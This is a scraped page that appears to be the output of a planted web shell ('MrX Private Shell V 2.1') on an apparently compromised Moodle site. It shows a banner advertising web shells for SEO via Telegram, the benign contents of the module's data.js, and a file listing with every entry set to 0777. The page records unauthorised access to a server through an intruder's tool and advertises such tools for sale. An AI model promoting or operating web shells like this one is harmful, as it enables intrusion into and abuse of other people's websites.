__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/**
* Javascript to insert the field tags into the textarea.
* Used when editing a data template
*/
function insert_field_tags(selectlist) {
var value = selectlist.options[selectlist.selectedIndex].value;
var editorname = 'template';
if (typeof tinyMCE == 'undefined') {
if (document.execCommand('insertText')) {
document.execCommand('insertText', false, value);
} else {
var element = document.getElementsByName(editorname)[0];
// For inserting when in normal textareas
insertAtCursor(element, value);
}
} else {
tinyMCE.execInstanceCommand(editorname, 'mceInsertContent', false, value);
}
}
/**
* javascript for hiding/displaying advanced search form when viewing
*/
function showHideAdvSearch(checked) {
var divs = document.getElementsByTagName('div');
for (var i = 0; i < divs.length; i++) {
if(divs[i].id.match('data_adv_form')) {
if(checked) {
divs[i].style.display = 'inline';
} else {
divs[i].style.display = 'none';
}
} else if (divs[i].id.match('reg_search')) {
if (!checked) {
divs[i].style.display = 'inline';
} else {
divs[i].style.display = 'none';
}
} else if (divs[i].id.match('advsearch-save-sec')) {
if (!checked) {
divs[i].style.display = 'inline';
} else {
divs[i].style.display = 'none';
}
}
}
}
M.data_urlpicker = {};
M.data_urlpicker.init = function(Y, options) {
options.formcallback = M.data_urlpicker.callback;
if (!M.core_filepicker.instances[options.client_id]) {
M.core_filepicker.init(Y, options);
}
Y.on('click', function(e, client_id) {
e.preventDefault();
M.core_filepicker.instances[client_id].show();
}, '#filepicker-button-'+options.client_id, null, options.client_id);
};
M.data_urlpicker.callback = function (params) {
document.getElementById('field_url_'+params.client_id).value = params.url;
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| amd | Folder | 0777 |
|
|
| backup | Folder | 0777 |
|
|
| classes | Folder | 0777 |
|
|
| db | Folder | 0777 |
|
|
| field | Folder | 0777 |
|
|
| lang | Folder | 0777 |
|
|
| pix | Folder | 0777 |
|
|
| preset | Folder | 0777 |
|
|
| templates | Folder | 0777 |
|
|
| tests | Folder | 0777 |
|
|
| UPGRADING.md | File | 454 B | 0777 |
|
| css.php | File | 2.43 KB | 0777 |
|
| data.js | File | 2.09 KB | 0777 |
|
| deprecatedlib.php | File | 9.41 KB | 0777 |
|
| edit.php | File | 7.84 KB | 0777 |
|
| export.php | File | 5.17 KB | 0777 |
|
| export_form.php | File | 5.65 KB | 0777 |
|
| field.php | File | 17.67 KB | 0777 |
|
| import.php | File | 4.87 KB | 0777 |
|
| import_form.php | File | 1.56 KB | 0777 |
|
| index.php | File | 5 KB | 0777 |
|
| js.php | File | 2.44 KB | 0777 |
|
| lib.php | File | 153.66 KB | 0777 |
|
| locallib.php | File | 56.66 KB | 0777 |
|
| mod_form.php | File | 8.69 KB | 0777 |
|
| preset.php | File | 6.48 KB | 0777 |
|
| preset_form.php | File | 4.44 KB | 0777 |
|
| renderer.php | File | 12.9 KB | 0777 |
|
| rsslib.php | File | 7.48 KB | 0777 |
|
| settings.php | File | 606 B | 0777 |
|
| styles.css | File | 4.21 KB | 0777 |
|
| tabs.php | File | 5.25 KB | 0777 |
|
| templates.php | File | 4.8 KB | 0777 |
|
| upgrade.txt | File | 7.27 KB | 0777 |
|
| version.php | File | 1.19 KB | 0777 |
|
| view.php | File | 22.28 KB | 0777 |
|